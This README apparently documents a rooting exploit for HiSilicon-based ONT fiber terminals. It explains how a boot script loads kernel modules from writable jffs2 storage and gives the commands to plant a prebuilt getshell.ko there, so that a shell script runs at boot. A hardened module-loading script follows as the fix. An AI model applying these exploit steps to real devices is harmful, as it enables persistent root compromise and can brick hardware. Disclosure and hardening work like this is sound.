## Note

This may brick your ONT device; use at your own risk!

## Usage

### Find an exploit to load a user-defined ko module

The exploit is in /etc/rc.d/rc.start/1.sdk_init.sh: a kernel module (.ko) is used to run the shell script /mnt/jffs2/hw/getshell.sh when the system reboots.

The logic flaw is in lines 200-206:

```sh
# load hisi modules
if [ -f /mnt/jffs2/TranStar/hi_sysctl.ko ]; then
    cd /mnt/jffs2/TranStar/
    echo "Loading the Temp HISI SD511X modules: "
else
    cd /lib/modules/hisi_sdk
    echo "Loading the HISI SD511X modules: "
fi
```

If /mnt/jffs2/TranStar/hi_sysctl.ko exists, the script runs cd /mnt/jffs2/TranStar/, so the working directory is now /mnt/jffs2/TranStar/, and /mnt/jffs2/TranStar/ is writable. So:

```sh
mkdir -p /mnt/jffs2/TranStar/
cp -rf /lib/modules/hisi_sdk/* /mnt/jffs2/TranStar/
```

In order to execute lines 261-262, change this in /mnt/jffs2/hw_boardinfo:

```
obj.id = "0x00000001" ; obj.value = "4";
```

Upload the getshell.ko module (compiled by 0neday; only supports r019):

```sh
# just for gpon
cp getshell.ko /mnt/jffs2/TranStar/hi_epon.ko

# or for epon
cp getshell.ko /mnt/jffs2/TranStar/hi_gpon.ko
```
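For comparison, here is a hardened counterpart to the "load hisi modules" block quoted above. This is an added example, not code from this README or from the ONT firmware. The weak block changes into a writable jffs2 directory whenever a marker file exists and then loads whatever hi_*.ko sits in the working directory; the version below resolves the module directory against one fixed location on the read-only rootfs, reports and ignores any override on writable storage, and fails closed if the trusted directory itself is on a writable mount. The directory names, the function names, and the MOUNTS_FILE variable (a stand-in for /proc/mounts so the mount check can be exercised against a constructed mount table) are assumptions.

```shell
#!/bin/sh
# Added example, not code from this README or the ONT firmware: a hardened
# replacement for the "load hisi modules" block. Directory names and the
# MOUNTS_FILE knob are assumptions.

TRUSTED_MODULE_DIR="/lib/modules/hisi_sdk"
MOUNTS_FILE="${MOUNTS_FILE:-/proc/mounts}"

# is_writable_mount DIR
# Returns 0 if the longest mount point containing DIR is mounted rw,
# 1 otherwise. Parses the /proc/mounts format: device mountpoint fstype opts.
is_writable_mount() {
    dir=$1
    best=""
    bestopts=""
    while read -r _dev mnt _fs opts _rest; do
        prefix="${mnt%/}/"          # "/" -> "/", "/mnt/jffs2" -> "/mnt/jffs2/"
        case "$dir" in
            "$mnt"|"$prefix"*)
                # Longest matching mount point wins, so /mnt/jffs2 beats /.
                if [ "${#mnt}" -gt "${#best}" ]; then
                    best=$mnt
                    bestopts=$opts
                fi
                ;;
        esac
    done < "$MOUNTS_FILE"
    case ",$bestopts," in
        *,rw,*) return 0 ;;
    esac
    return 1
}

# select_module_dir [OVERRIDE_DIR]
# Prints the only directory kernel modules may be loaded from. An override
# directory (the original script's /mnt/jffs2/TranStar/) is reported if it
# exists but never used. If the trusted directory is on a writable mount,
# nothing is printed and the function returns 1 so the caller loads nothing.
select_module_dir() {
    override=$1
    if [ -n "$override" ] && [ -e "$override" ]; then
        echo "ignoring module override directory $override on writable storage" >&2
    fi
    if is_writable_mount "$TRUSTED_MODULE_DIR"; then
        echo "refusing to load kernel modules from writable $TRUSTED_MODULE_DIR" >&2
        return 1
    fi
    printf '%s\n' "$TRUSTED_MODULE_DIR"
}

# load_hisi_modules [OVERRIDE_DIR]
# Drop-in replacement for the original block: resolve the directory first,
# then insmod each module by absolute path instead of relying on cwd.
load_hisi_modules() {
    moddir=$(select_module_dir "${1:-/mnt/jffs2/TranStar/}") || return 1
    echo "Loading the HISI SD511X modules from $moddir: "
    for ko in "$moddir"/*.ko; do
        [ -f "$ko" ] || continue
        insmod "$ko" || return 1
    done
}
```

Calling load_hisi_modules in place of lines 200-206 means that creating /mnt/jffs2/TranStar/hi_sysctl.ko and dropping a .ko beside it no longer changes which files are loaded, because the directory is fixed and checked against the mount table rather than chosen by the presence of a marker file.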

## License

GPLv3.0